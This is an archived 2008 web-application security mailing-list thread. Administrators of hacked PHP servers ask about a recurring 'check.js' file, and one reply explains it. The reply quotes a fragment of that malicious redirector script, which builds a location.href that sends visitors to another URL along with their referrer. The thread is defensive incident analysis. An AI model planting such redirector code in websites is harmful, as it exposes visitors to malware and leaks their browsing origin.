Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

webappsec logo WebApp Sec mailing list archives

Re: PHP Security
From: "Greg Song" <bigrootno1 () gmail com>
Date: Wed, 19 Mar 2008 08:50:28 +0900
Hi,

There are some files include 'check.js' same as you.

First of all, 'check.js' is kinds of redirector.

For example, If someone visited website that includes 'check.js',
request redirect to some other URLs.(usually getting malicious code)
and I guess it gather information(visit from where).

parts of check.js
...
google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|ramble...
location.href=JSS3+'?r='+encodeURIComponent(document.referrer)+'&s='+JSS2
...

Greg.

2008/3/18, Sindre Øvrebø <sindre () webhuset no>:



----- Original message -----
From: "Greg Song" <bigrootno1 () gmail com>
To: webappsec () securityfocus com
Date: Tue, 18 Mar 2008 08:58:49 +0900
Subject: PHP Security


Hi all
Thesedays I'm analyzing the solarys system that using apache web
server and php. Of cause it hacked.
I could not find reason of some situation that the specified directory
are created over and over(it includes check.js)
Weblog record as below

xxx.xxx.xxx.xxx GET "/XXX/ahibix/check.js

Some pages can upload the file but it didn't work when I uploaded some php
file.
I'm wondering how it makes some directories.
Any suggestin,ideas.
Thanks all


Hi,

I am replying outside the list.

I just discovered check.js, and some other files, on one of mye servers
yesterday.

What does check.js do? I am not familiar with this/these scripts.

Would be really cool if you replied :)

Sindre Øvrebø


-------------------------------------------------------------------------
Sponsored by: Watchfire
Methodologies & Tools for Web Application Security Assessment
With the rapid rise in the number and types of security threats, web application security assessments should be 
considered a crucial phase in the development of any web application. What methodology should be followed? What tools 
can accelerate the assessment process? Download this Whitepaper today!

https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F
-------------------------------------------------------------------------

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]